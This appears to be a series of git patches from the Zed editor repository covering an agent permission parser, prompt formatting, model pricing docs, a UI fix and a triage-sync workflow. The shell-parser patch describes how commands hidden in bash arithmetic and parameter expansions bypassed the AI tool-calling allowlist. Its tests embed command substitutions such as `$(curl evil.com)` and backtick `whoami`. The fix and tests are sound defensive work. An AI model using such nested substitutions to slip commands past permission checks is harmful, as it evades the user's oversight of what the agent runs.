.and_then(|preset| preset.tools.get(tool_name).copied()) + .unwrap_or(self.enable_all_context_servers) } pub fn save_to_settings( @@ -200,3 +199,52 @@ impl From for ContextServerPreset { } } } + +#[cfg(test)] +mod tests { + use super::*; + + fn profile( + enable_all_context_servers: bool, + context_servers: IndexMap, ContextServerPreset>, + ) -> AgentProfileSettings { + AgentProfileSettings { + name: "test".into(), + tools: IndexMap::default(), + enable_all_context_servers, + context_servers, + default_model: None, + } + } + + fn preset(tools: &[(&str, bool)]) -> ContextServerPreset { + ContextServerPreset { + 
tools: tools + .iter() + .map(|(name, enabled)| (Arc::from(*name), *enabled)) + .collect(), + } + } + + #[test] + fn explicit_false_disables_tool_when_enable_all_is_true() { + let mut servers = IndexMap::default(); + servers.insert(Arc::from("server"), preset(&[("disabled_tool", false)])); + let profile = profile(true, servers); + + assert!(!profile.is_context_server_tool_enabled("server", "disabled_tool")); + assert!(profile.is_context_server_tool_enabled("server", "other_tool")); + assert!(profile.is_context_server_tool_enabled("other_server", "any_tool")); + } + + #[test] + fn explicit_true_enables_tool_when_enable_all_is_false() { + let mut servers = IndexMap::default(); + servers.insert(Arc::from("server"), preset(&[("enabled_tool", true)])); + let profile = profile(false, servers); + + assert!(profile.is_context_server_tool_enabled("server", "enabled_tool")); + assert!(!profile.is_context_server_tool_enabled("server", "other_tool")); + assert!(!profile.is_context_server_tool_enabled("other_server", "any_tool")); + } +} From b2822d98c1649f3088dd0571e2c3c3c9ab88cd44 Mon Sep 17 00:00:00 2001 From: Richard Feldman Date: Tue, 5 May 2026 12:25:56 -0400 Subject: [PATCH 204/231] Extract nested command substitutions from arithmetic expansions (#54690) Bash arithmetic expansion `$((...))` can contain command substitutions like `$(curl evil.com)`. Previously, `extract_commands_from_word_piece` treated `ArithmeticExpression` as a no-op, so nested commands inside `$(( ... ))` were never extracted for allowlist checking. This fix re-parses the `ArithmeticExpression` value string using `brush_parser::word::parse` and recursively extracts any embedded command substitutions, mirroring how `CommandSubstitution` and `DoubleQuotedSequence` are already handled. Closes SEC-267 Release Notes: - Commands nested inside bash arithmetic expansions (e.g. `$(($(curl example.com)))`) are now understood by the tool-calling permissions regexes. 
--- .../src/shell_command_parser.rs | 177 +++++++++++++++++- 1 file changed, 174 insertions(+), 3 deletions(-) diff --git a/crates/shell_command_parser/src/shell_command_parser.rs b/crates/shell_command_parser/src/shell_command_parser.rs index 2ab42dd36bb10c..e4e80d095ee7b3 100644 --- a/crates/shell_command_parser/src/shell_command_parser.rs +++ b/crates/shell_command_parser/src/shell_command_parser.rs @@ -875,13 +875,101 @@ fn extract_commands_from_word_piece(piece: &WordPiece, commands: &mut Vec { + // The arithmetic body may contain `$(...)` or `${...}` that bash will + // evaluate before doing arithmetic. Re-parse to extract those. + // We propagate parse failures with `?` so that callers fail closed + // (treating the whole input as a parse failure) rather than silently + // dropping commands hidden inside content brush couldn't tokenize. + extract_commands_from_word_string(&expr.value, commands)?; + } + WordPiece::ParameterExpansion(expr) => { + extract_commands_from_parameter_expr(expr, commands)?; + } WordPiece::EscapeSequence(_) | WordPiece::SingleQuotedText(_) | WordPiece::Text(_) | WordPiece::AnsiCQuotedText(_) - | WordPiece::TildePrefix(_) - | WordPiece::ParameterExpansion(_) - | WordPiece::ArithmeticExpression(_) => {} + | WordPiece::TildePrefix(_) => {} + } + Some(()) +} + +/// Re-parses a string as a bash word and recurses into its pieces to extract +/// any nested command substitutions. Returns `None` (failing closed) if brush +/// cannot tokenize the input, so callers treat allowlist decisions about this +/// input as untrusted. 
+fn extract_commands_from_word_string(s: &str, commands: &mut Vec) -> Option<()> { + let options = ParserOptions::default(); + let pieces = brush_parser::word::parse(s, &options).ok()?; + for inner_piece in pieces { + extract_commands_from_word_piece(&inner_piece.piece, commands)?; + } + Some(()) +} + +/// Recurses into the string-typed fields of a parameter expansion that bash +/// will subject to command substitution at expansion time, mirroring the +/// arithmetic expansion handling. Failing to extend this when adding new +/// `ParameterExpr` variants risks an allowlist bypass via e.g. +/// `${V:-$(curl evil)}`, `${V/pat/$(curl evil)}`, `${V:$(($(curl))):1}`. +fn extract_commands_from_parameter_expr( + expr: &brush_parser::word::ParameterExpr, + commands: &mut Vec, +) -> Option<()> { + use brush_parser::word::ParameterExpr; + match expr { + ParameterExpr::Parameter { .. } + | ParameterExpr::ParameterLength { .. } + | ParameterExpr::Transform { .. } + | ParameterExpr::VariableNames { .. } + | ParameterExpr::MemberKeys { .. } => {} + ParameterExpr::UseDefaultValues { default_value, .. } + | ParameterExpr::AssignDefaultValues { default_value, .. } => { + if let Some(value) = default_value { + extract_commands_from_word_string(value, commands)?; + } + } + ParameterExpr::IndicateErrorIfNullOrUnset { error_message, .. } => { + if let Some(value) = error_message { + extract_commands_from_word_string(value, commands)?; + } + } + ParameterExpr::UseAlternativeValue { + alternative_value, .. + } => { + if let Some(value) = alternative_value { + extract_commands_from_word_string(value, commands)?; + } + } + ParameterExpr::RemoveSmallestSuffixPattern { pattern, .. } + | ParameterExpr::RemoveLargestSuffixPattern { pattern, .. } + | ParameterExpr::RemoveSmallestPrefixPattern { pattern, .. } + | ParameterExpr::RemoveLargestPrefixPattern { pattern, .. } + | ParameterExpr::UppercaseFirstChar { pattern, .. } + | ParameterExpr::UppercasePattern { pattern, .. 
} + | ParameterExpr::LowercaseFirstChar { pattern, .. } + | ParameterExpr::LowercasePattern { pattern, .. } => { + if let Some(pattern) = pattern { + extract_commands_from_word_string(pattern, commands)?; + } + } + ParameterExpr::Substring { offset, length, .. } => { + extract_commands_from_word_string(&offset.value, commands)?; + if let Some(length) = length { + extract_commands_from_word_string(&length.value, commands)?; + } + } + ParameterExpr::ReplaceSubstring { + pattern, + replacement, + .. + } => { + extract_commands_from_word_string(pattern, commands)?; + if let Some(replacement) = replacement { + extract_commands_from_word_string(replacement, commands)?; + } + } } Some(()) } @@ -1754,4 +1842,87 @@ mod tests { TerminalCommandValidation::Unsafe ); } + + #[test] + fn test_arithmetic_expansion_nested_command_substitution() { + let commands = extract_commands("echo $(($(curl evil.com)))").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_arithmetic_expansion_nested_backtick_substitution() { + let commands = extract_commands("echo $((`whoami`))").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.contains(&"whoami".to_string())); + } + + #[test] + fn test_arithmetic_expansion_without_substitution() { + let commands = extract_commands("echo $((1+2))").expect("parse failed"); + assert_eq!(commands, vec!["echo $((1+2))"]); + } + + #[test] + fn test_arithmetic_expansion_doubly_nested_command_substitution() { + let commands = extract_commands("echo $(($(($(curl evil.com)))))").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_arithmetic_expansion_inside_double_quotes() { + let commands = extract_commands("echo \"$(($(curl evil.com)))\"").expect("parse failed"); + assert!(commands.iter().any(|c| 
c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_default_value_extracts_command_substitution() { + let commands = extract_commands("echo ${V:-$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_assign_default_extracts_command_substitution() { + let commands = extract_commands("echo ${V:=$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_alternative_value_extracts_command_substitution() { + let commands = extract_commands("echo ${V:+$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_error_message_extracts_command_substitution() { + let commands = extract_commands("echo ${V:?$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_replacement_extracts_command_substitution() { + let commands = extract_commands("echo ${V/x/$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_suffix_pattern_extracts_command_substitution() { + let commands = extract_commands("echo ${V%$(curl evil.com)}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } + + #[test] + fn test_parameter_expansion_substring_offset_extracts_command_substitution() { + let commands = extract_commands("echo 
${V:$(($(curl evil.com))):1}").expect("parse failed"); + assert!(commands.iter().any(|c| c.contains("echo"))); + assert!(commands.iter().any(|c| c.contains("curl"))); + } } From ab4fd8dac3ee20554f61e72c77bc8cb4f40b80c3 Mon Sep 17 00:00:00 2001 From: Oleksiy Syvokon Date: Tue, 5 May 2026 20:10:03 +0300 Subject: [PATCH 205/231] ep: Fix V0420 Diagnostics format (#55798) - Truncated diagnostics to fit ~2000 tokens - Moved the diagnostics section before the cursor snippet - Increased total tokens limit for this prompt to 8192 tokens Release Notes: - N/A Co-authored-by: Ben Kunkle --- crates/zeta_prompt/src/zeta_prompt.rs | 142 ++++++++++++++++++++------ 1 file changed, 113 insertions(+), 29 deletions(-) diff --git a/crates/zeta_prompt/src/zeta_prompt.rs b/crates/zeta_prompt/src/zeta_prompt.rs index 12767122fc4059..7bc37ff698c86b 100644 --- a/crates/zeta_prompt/src/zeta_prompt.rs +++ b/crates/zeta_prompt/src/zeta_prompt.rs @@ -30,6 +30,25 @@ fn apply_prompt_budget_margin(max_tokens: usize) -> usize { (max_tokens as f64 * 0.9).floor() as usize } +/// Ensure text fits into the tokens budget; trim by line boundaries if needed. 
+pub fn clamp_text_to_token_count(text: &str, max_tokens: usize) -> &str { + if estimate_tokens(text.len()) <= max_tokens { + return text; + } + + let mut end_byte_offset = 0; + + for line in text.split_inclusive('\n') { + if estimate_tokens(line.len() + end_byte_offset) > max_tokens { + break; + } + + end_byte_offset += line.len(); + } + + &text[..end_byte_offset] +} + #[derive(Clone, Debug, PartialEq, Hash, Serialize, Deserialize)] pub struct ZetaPromptInput { pub cursor_path: Arc, @@ -247,8 +266,8 @@ pub fn format_zeta_prompt(input: &ZetaPromptInput, format: ZetaFormat) -> Option | ZetaFormat::V0316SeedMultiRegions | ZetaFormat::V0317SeedMultiRegions | ZetaFormat::V0331SeedCoderModelPy - | ZetaFormat::V0318SeedMultiRegions - | ZetaFormat::V0420Diagnostics => 4096, + | ZetaFormat::V0318SeedMultiRegions => 4096, + ZetaFormat::V0420Diagnostics => 8192, ZetaFormat::V0327SingleFile => 16384, }; @@ -696,7 +715,8 @@ pub fn format_prompt_with_budget_for_format( let empty_files = Vec::new(); let input_related_files = input.related_files.as_deref().unwrap_or(&empty_files); let filtered_related_files = if let Some(cursor_excerpt_start_row) = input.excerpt_start_row { - let relative_row_range = offset_range_to_row_range(&input.cursor_excerpt, context_range); + let relative_row_range = + offset_range_to_row_range(&input.cursor_excerpt, context_range.clone()); let row_range = relative_row_range.start + cursor_excerpt_start_row ..relative_row_range.end + cursor_excerpt_start_row; filter_redundant_excerpts( @@ -719,6 +739,7 @@ pub fn format_prompt_with_budget_for_format( | ZetaFormat::V0317SeedMultiRegions | ZetaFormat::V0420Diagnostics => { let mut cursor_section = String::new(); + write_cursor_excerpt_section_for_format( format, &mut cursor_section, @@ -728,9 +749,13 @@ pub fn format_prompt_with_budget_for_format( cursor_offset, ); - if format == ZetaFormat::V0420Diagnostics { - cursor_section.push_str(&format_active_buffer_diagnostics(input)); - } + let cursor_buffer_row = 
input.excerpt_start_row.map(|excerpt_start_row| { + excerpt_start_row + + input.cursor_excerpt[..context_range.start + cursor_offset] + .bytes() + .filter(|byte| *byte == b'\n') + .count() as u32 + }); let budget_with_margin = apply_prompt_budget_margin(max_tokens); seed_coder::assemble_fim_prompt( @@ -739,6 +764,12 @@ pub fn format_prompt_with_budget_for_format( &cursor_section, &input.events, related_files, + if format == ZetaFormat::V0420Diagnostics { + &input.active_buffer_diagnostics + } else { + &[] + }, + cursor_buffer_row, budget_with_margin, ) } @@ -807,24 +838,60 @@ pub fn format_prompt_with_budget_for_format( return Some(prompt); } -fn format_active_buffer_diagnostics(input: &ZetaPromptInput) -> String { - let mut output = format!("{}diagnostics\n", seed_coder::FILE_MARKER); +fn format_active_buffer_diagnostics_with_budget( + diagnostics: &[ActiveBufferDiagnostic], + cursor_buffer_row: Option, + budget: usize, +) -> String { + if diagnostics.is_empty() || budget == 0 { + return String::new(); + } - if input.active_buffer_diagnostics.is_empty() { - output.push_str("No Diagnostics\n"); - return output; + let mut diagnostic_indices = (0..diagnostics.len()).collect::>(); + if let Some(cursor_buffer_row) = cursor_buffer_row { + diagnostic_indices.sort_by_key(|index| { + let range = &diagnostics[*index].snippet_buffer_row_range; + u32::abs_diff(cursor_buffer_row, range.start) + + u32::abs_diff(cursor_buffer_row, range.end) + }); } - for diagnostic in &input.active_buffer_diagnostics { - writeln!( - output, - "*{}*:\n```\n{}\n```", - diagnostic.message, diagnostic.snippet - ) - .ok(); + let mut output = format!("{}diagnostics\n", seed_coder::FILE_MARKER); + let header_tokens = estimate_tokens(output.len()); + if header_tokens > budget { + return String::new(); } - output + let mut used_tokens = header_tokens; + let mut included_diagnostics = 0; + for diagnostic_index in diagnostic_indices.into_iter().take(10) { + let diagnostic = &diagnostics[diagnostic_index]; 
+ let snippet = clamp_text_to_token_count(&diagnostic.snippet, 256); + + let diagnostic_section = format!( + "*{}*:\n```\n{}{}\n```\n", + diagnostic.message, + snippet, + if snippet.len() < diagnostic.snippet.len() { + "..." + } else { + "" + } + ); + let diagnostic_tokens = estimate_tokens(diagnostic_section.len()); + if used_tokens + diagnostic_tokens > budget { + break; + } + output.push_str(&diagnostic_section); + used_tokens += diagnostic_tokens; + included_diagnostics += 1; + } + + if included_diagnostics == 0 { + String::new() + } else { + output + } } pub fn filter_redundant_excerpts( @@ -3363,6 +3430,7 @@ pub mod seed_coder { cursor_offset: usize, events: &[Arc], related_files: &[RelatedFile], + diagnostics: &[ActiveBufferDiagnostic], max_tokens: usize, ) -> String { let cursor_prefix_section = @@ -3373,6 +3441,8 @@ pub mod seed_coder { &cursor_prefix_section, events, related_files, + diagnostics, + None, max_tokens, ) } @@ -3383,6 +3453,8 @@ pub mod seed_coder { cursor_prefix_section: &str, events: &[Arc], related_files: &[RelatedFile], + diagnostics: &[ActiveBufferDiagnostic], + cursor_buffer_row: Option, max_tokens: usize, ) -> String { let suffix_section = build_suffix_section(context, editable_range); @@ -3399,19 +3471,30 @@ pub mod seed_coder { max_edit_event_count_for_format(&ZetaFormat::V0211SeedCoder), ); let edit_history_tokens = estimate_tokens(edit_history_section.len() + "\n".len()); - let budget_after_edit_history = - budget_after_cursor.saturating_sub(edit_history_tokens + "\n".len()); + let budget_after_edit_history = budget_after_cursor.saturating_sub(edit_history_tokens); + + let diagnostics_section = super::format_active_buffer_diagnostics_with_budget( + diagnostics, + cursor_buffer_row, + budget_after_edit_history, + ); + let diagnostics_tokens = estimate_tokens(diagnostics_section.len() + "\n".len()); + let budget_after_diagnostics = budget_after_edit_history.saturating_sub(diagnostics_tokens); let related_files_section = 
super::format_related_files_within_budget( related_files, FILE_MARKER, "", - budget_after_edit_history, + budget_after_diagnostics, ); let mut prompt = String::new(); prompt.push_str(&suffix_section); prompt.push_str(FIM_PREFIX); + prompt.push_str(&diagnostics_section); + if !diagnostics_section.is_empty() { + prompt.push('\n'); + } prompt.push_str(&related_files_section); if !related_files_section.is_empty() { prompt.push('\n'); @@ -5206,7 +5289,7 @@ mod tests { } #[test] - fn test_v0420_formats_diagnostics_after_cursor_file() { + fn test_v0420_formats_diagnostics_before_related_files() { let mut input = make_input( "prefix\neditable\nsuffix", 7..15, @@ -5231,17 +5314,18 @@ mod tests { indoc! {r#" <[fim-suffix]> suffix - <[fim-prefix]>related.rs + <[fim-prefix]>diagnostics + *missing semicolon*: + ``` + let value = 1 + ``` + + related.rs fn helper() {} test.rs prefix <|marker_1|>edi<|user_cursor|>table<|marker_2|> - diagnostics - *missing semicolon*: - ``` - let value = 1 - ``` <[fim-middle]>"#} ); } From f7537eed42961d250ac9fc65ce47b9bed1ce7657 Mon Sep 17 00:00:00 2001 From: morgankrey Date: Tue, 5 May 2026 12:17:59 -0500 Subject: [PATCH 206/231] Add GPT-5.5 and GPT-5.5 pro model documentation (#55795) ## Summary - Add pricing table entries for GPT-5.5 and GPT-5.5 pro - Add context window entries for GPT-5.5/5.5 pro (272k) - Fix context window values for all OpenAI models from 400k to 272k to match actual cloud-enforced limit - Update student plan note to exclude GPT-5.5 pro - Update page description Follows up on #54820 which added code support for GPT-5.5 models. The 272k limit is enforced in the cloud due to context-tiered pricing not yet being implemented. 
## Test plan - [ ] Verify pricing matches cloud repo configuration - [ ] Check docs render correctly Release Notes: - N/A --- docs/src/ai/models.md | 25 ++++++++++++++++--------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/docs/src/ai/models.md b/docs/src/ai/models.md index da2f1945725682..e2d0c1c83cd048 100644 --- a/docs/src/ai/models.md +++ b/docs/src/ai/models.md @@ -1,13 +1,13 @@ --- title: AI Models and Pricing - Zed -description: AI models available via Zed Pro including Claude, GPT-5.4, Gemini 3.1 Pro, and Grok. Pricing, context windows, and tool call support. +description: AI models available via Zed Pro including Claude, GPT-5.5, Gemini 3.1 Pro, and Grok. Pricing, context windows, and tool call support. --- # Models Zed's plans offer hosted versions of major LLMs with higher rate limits than direct API access. Model availability is updated regularly. To use your own API keys instead, see [LLM Providers](./llm-providers.md). For general setup, see [Configuration](./configuration.md). -> **Note:** Claude Opus models and GPT-5.4 pro are not available on the [Student plan](./plans-and-usage.md#student). +> **Note:** Claude Opus models, GPT-5.5 pro, and GPT-5.4 pro are not available on the [Student plan](./plans-and-usage.md#student). 
| Model | Provider | Token Type | Provider Price per 1M tokens | Zed Price per 1M tokens | | ---------------------- | --------- | ------------------- | ---------------------------- | ----------------------- | @@ -35,6 +35,11 @@ Zed's plans offer hosted versions of major LLMs with higher rate limits than dir | | Anthropic | Output | $5.00 | $5.50 | | | Anthropic | Input - Cache Write | $1.25 | $1.375 | | | Anthropic | Input - Cache Read | $0.10 | $0.11 | +| GPT-5.5 pro | OpenAI | Input | $30.00 | $33.00 | +| | OpenAI | Output | $180.00 | $198.00 | +| GPT-5.5 | OpenAI | Input | $5.00 | $5.50 | +| | OpenAI | Output | $30.00 | $33.00 | +| | OpenAI | Cached Input | $0.50 | $0.55 | | GPT-5.4 pro | OpenAI | Input | $30.00 | $33.00 | | | OpenAI | Output | $180.00 | $198.00 | | GPT-5.4 | OpenAI | Input | $2.50 | $2.75 | @@ -102,13 +107,15 @@ A context window is the maximum span of text and code an LLM can consider at onc | Claude Sonnet 4.5 | Anthropic | 200k | | Claude Sonnet 4.6 | Anthropic | 1M | | Claude Haiku 4.5 | Anthropic | 200k | -| GPT-5.4 pro | OpenAI | 400k | -| GPT-5.4 | OpenAI | 400k | -| GPT-5.3-Codex | OpenAI | 400k | -| GPT-5.2 | OpenAI | 400k | -| GPT-5.2-Codex | OpenAI | 400k | -| GPT-5 mini | OpenAI | 400k | -| GPT-5 nano | OpenAI | 400k | +| GPT-5.5 pro | OpenAI | 272k input / 400k total | +| GPT-5.5 | OpenAI | 272k input / 400k total | +| GPT-5.4 pro | OpenAI | 272k input / 400k total | +| GPT-5.4 | OpenAI | 272k input / 400k total | +| GPT-5.3-Codex | OpenAI | 272k input / 400k total | +| GPT-5.2 | OpenAI | 272k input / 400k total | +| GPT-5.2-Codex | OpenAI | 272k input / 400k total | +| GPT-5 mini | OpenAI | 272k input / 400k total | +| GPT-5 nano | OpenAI | 272k input / 400k total | | Gemini 3.1 Pro | Google | 200k | | Gemini 3 Flash | Google | 200k | | Grok 4 | X.ai | 128k | From 819ecb240991706d291f5310cc545cfe4f4a0cbc Mon Sep 17 00:00:00 2001 From: Remco Smits Date: Tue, 5 May 2026 19:33:57 +0200 Subject: [PATCH 207/231] git_panel: Fix commit 
message text behind `Open Commit Modal` button (#55565)

This PR fixes an issue where your commit message inside the git panel commit editor could be behind the `Open Commit Modal` button.

**Before**

Screenshot 2026-05-03 at 18 11 33

**After**

Screenshot 2026-05-05 at 18 18 58

Self-Review Checklist:

- [x] I've reviewed my own diff for quality, security, and reliability
- [x] Unsafe blocks (if any) have justifying comments
- [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist)
- [x] Tests cover the new/changed behavior
- [x] Performance impact has been considered and is acceptable

Release Notes:

- Fix git commit message editor text that could be behind the `Open Commit Modal` button

---
 crates/git_ui/src/git_panel.rs | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs
index d4cf03c853848a..820c880a1bd19a 100644
--- a/crates/git_ui/src/git_panel.rs
+++ b/crates/git_ui/src/git_panel.rs
@@ -4535,7 +4535,7 @@ impl GitPanel {
                 .child(EditorElement::new(&self.commit_editor, panel_editor_style)),
             )
             .child(
-                h_flex()
+                v_flex()
                     .absolute()
                     .top_2()
                     .right_2()

From 786799ff1e08fdb4515a9327f6d144e94fff13e7 Mon Sep 17 00:00:00 2001
From: Lucas White
Date: Tue, 5 May 2026 10:57:43 -0700
Subject: [PATCH 208/231] Add issue triage project sync workflow (#55796)

Auto-syncs derived fields on a private GitHub Project (#84) from issue labels and comment activity. Goal is to more effectively track issue states and make sure we're triaging, closing the loop when possible/relevant.
Self-Review Checklist: - [ x] I've reviewed my own diff for quality, security, and reliability - [ x] Unsafe blocks (if any) have justifying comments - [ n/a] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ n/a] Tests cover the new/changed behavior - [ n/a] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- .github/workflows/triage_project_sync.yml | 173 +++++ script/triage_project_sync.py | 828 ++++++++++++++++++++++ 2 files changed, 1001 insertions(+) create mode 100644 .github/workflows/triage_project_sync.yml create mode 100644 script/triage_project_sync.py diff --git a/.github/workflows/triage_project_sync.yml b/.github/workflows/triage_project_sync.yml new file mode 100644 index 00000000000000..b652e0fb0a79ac --- /dev/null +++ b/.github/workflows/triage_project_sync.yml @@ -0,0 +1,173 @@ +# Sync triage state into "Zed weekly triage" (project #84). +# +# Runs in two modes: +# 1. Event-driven (primary): fires on issue events + new issue comments. +# Re-derives Status / Stale since / Aged? / Intake week for that one +# issue. Latency: ~10–30 seconds end-to-end. +# 2. Daily cron (safety net): re-derives across all project items at 06:00 +# UTC. Catches any events that GH dropped under load. +# +# Auth: GitHub App `ZED_COMMUNITY_BOT_APP_ID` with +# `Organization Projects: Read and write` permission added. Token is +# requested with `owner: zed-industries` so it can mutate org-level project +# items (the default repo-scoped token is insufficient for org projects). +# +# This workflow only mutates the triage project (#84). It does not write +# labels, comments, or any issue metadata. Adding any other write capability +# requires a separate workflow. 
+ +name: Triage Project Sync (#84) + +on: + issues: + types: + - opened + - reopened + - closed + - labeled + - unlabeled + - assigned + - unassigned + - edited + issue_comment: + types: [created] + schedule: + - cron: "0 6 * * *" # daily 06:00 UTC + workflow_dispatch: + inputs: + issue_number: + description: "Issue number to sync (leave blank to sync all)" + type: number + required: false + dry_run: + description: "Dry run (compute but don't mutate)" + type: boolean + default: false + +# Coalesce rapid event bursts on the same issue (e.g., 5 labels added at once +# = 5 events). Cancel any in-progress run for the same issue when a new event +# arrives — the latest run will compute the most up-to-date state. +concurrency: + group: triage-sync-${{ github.event.issue.number || github.run_id }} + cancel-in-progress: true + +# Default to no permissions for any job in this workflow. The single job below +# explicitly opts back in to `contents: read` for the sparse checkout. If a +# future job is added without its own `permissions:` block, it will inherit +# this empty default rather than the repo-wide token defaults. +permissions: {} + +jobs: + sync: + name: Sync triage project + # Run only on the canonical repo (not forks); skip PR comments since this + # workflow is for issues only. + if: | + github.repository == 'zed-industries/zed' && + (github.event_name != 'issue_comment' || github.event.issue.pull_request == null) + runs-on: ubuntu-latest + timeout-minutes: 15 + permissions: + contents: read + + steps: + - name: Checkout (sparse — script only) + uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5.0.1 + with: + sparse-checkout: script/triage_project_sync.py + sparse-checkout-cone-mode: false + # Don't write GITHUB_TOKEN into .git/config. We never push from this + # workflow; we only read one file. Keeps the token out of any + # filesystem state that subsequent steps could access. 
+ persist-credentials: false + + - name: Get App installation token + id: token + uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3.0.0 + with: + app-id: ${{ secrets.ZED_COMMUNITY_BOT_APP_ID }} + private-key: ${{ secrets.ZED_COMMUNITY_BOT_PRIVATE_KEY }} + # IMPORTANT: org-scoped token is required for org-level project + # mutations. Without `owner:`, the default token is repo-scoped and + # cannot write to org projects. + owner: zed-industries + # Scope the token down to the minimum needed for this workflow. + # Even though the App may have broader permissions for other + # automations (e.g., Issues:Write for the dupe-bot), this token + # only carries what we list below. Per the action's docs, an + # unrequested permission is *not* available on the resulting token. + # + # Required: + # - organization-projects:write — mutate project items + read + # project schema + # - members:read — query the `staff` team membership + # - issues:read — fetch issue body, labels, comments + # - metadata:read — always required for any GH API access + permission-organization-projects: write + permission-members: read + permission-issues: read + permission-metadata: read + + - name: Setup Python + uses: actions/setup-python@a26af69be951a213d495a4c3e4e4022e16d87065 # v5.6.0 + with: + python-version: "3.12" + + - name: Install dependencies + run: pip install requests + + - name: Sync (event-driven, single issue) + if: github.event_name == 'issues' || github.event_name == 'issue_comment' + env: + GITHUB_TOKEN: ${{ steps.token.outputs.token }} + ISSUE_NUMBER: ${{ github.event.issue.number }} + run: | + python script/triage_project_sync.py --issue "$ISSUE_NUMBER" + + - name: Sync (cron, all items) + if: github.event_name == 'schedule' + env: + GITHUB_TOKEN: ${{ steps.token.outputs.token }} + run: | + python script/triage_project_sync.py --all + + - name: Sync (manual dispatch — single) + if: github.event_name == 'workflow_dispatch' && inputs.issue_number 
!= '' + env: + GITHUB_TOKEN: ${{ steps.token.outputs.token }} + ISSUE_NUMBER: ${{ inputs.issue_number }} + DRY_RUN: ${{ inputs.dry_run }} + run: | + if [ "$DRY_RUN" = "true" ]; then + python script/triage_project_sync.py --issue "$ISSUE_NUMBER" --dry-run + else + python script/triage_project_sync.py --issue "$ISSUE_NUMBER" + fi + + - name: Sync (manual dispatch — all) + if: github.event_name == 'workflow_dispatch' && inputs.issue_number == '' + env: + GITHUB_TOKEN: ${{ steps.token.outputs.token }} + DRY_RUN: ${{ inputs.dry_run }} + run: | + if [ "$DRY_RUN" = "true" ]; then + python script/triage_project_sync.py --all --dry-run + else + python script/triage_project_sync.py --all + fi + + - name: Write summary + if: always() + env: + EVENT_NAME: ${{ github.event_name }} + ISSUE_NUMBER: ${{ github.event.issue.number }} + run: | + { + echo "## Triage sync summary" + echo "" + echo "- Event: \`$EVENT_NAME\`" + if [ -n "$ISSUE_NUMBER" ]; then + echo "- Issue: #$ISSUE_NUMBER" + fi + echo "- Project: [#84 Zed weekly triage](https://github.com/orgs/zed-industries/projects/84)" + } >> "$GITHUB_STEP_SUMMARY" diff --git a/script/triage_project_sync.py b/script/triage_project_sync.py new file mode 100644 index 00000000000000..239ae9f7ab4823 --- /dev/null +++ b/script/triage_project_sync.py @@ -0,0 +1,828 @@ +#!/usr/bin/env python3 +""" +triage_project_sync.py +====================== + +Sync triage state from `zed-industries/zed` issues into the +"Zed weekly triage" project (#84). + +Auto-derives `Status`, `Stale since`, `Aged?`, `Intake week` from issue labels ++ comment activity + assignees. Mutates the project to +reflect the derived state. + +The labels and the issue thread are the source of truth. The project is a +*derived view* — manual edits to the synced fields will be overwritten on the +next sync. + +Modes +----- + --issue N Sync a single issue. Used by GH Actions on issue events. + --all Sync every item currently in the project. Used by daily + cron as a safety net. 
+ --dry-run Compute derivations and log them, but don't mutate the + project. Safe for local testing / first deploy. + +Auth +---- +Reads `GITHUB_TOKEN` from env. For production, this is an installation token +from the `ZED_COMMUNITY_BOT_APP_ID` GitHub App, scoped to +`owner: zed-industries`, with `Organization Projects: Read and write`. + +For local `--dry-run` testing, a personal token with `repo, read:org, +read:project` is sufficient. + +Idempotency / safety +-------------------- +- Every run re-derives all fields from current issue state. Running twice + produces the same result as once. +- Failures on a single issue (in `--all` mode) are logged and the run + continues. One bad item doesn't poison the batch. +- `--dry-run` makes no GraphQL mutations and no REST writes. + +Dependencies +------------ + pip install requests +""" + +from __future__ import annotations + +import argparse +import json +import os +import sys +import time +from dataclasses import dataclass +from datetime import datetime, timedelta, timezone + +import requests + +# --------------------------------------------------------------------------- +# Constants + +REPO_OWNER = "zed-industries" +REPO_NAME = "zed" +REPO = f"{REPO_OWNER}/{REPO_NAME}" + +PROJECT_NUMBER = 84 +PROJECT_OWNER = REPO_OWNER + +STAFF_TEAM_SLUG = "staff" + +# Status names. MUST match the option names configured in project #84. +# (Casing matters — GH Projects single-select option matching is case-sensitive.) 
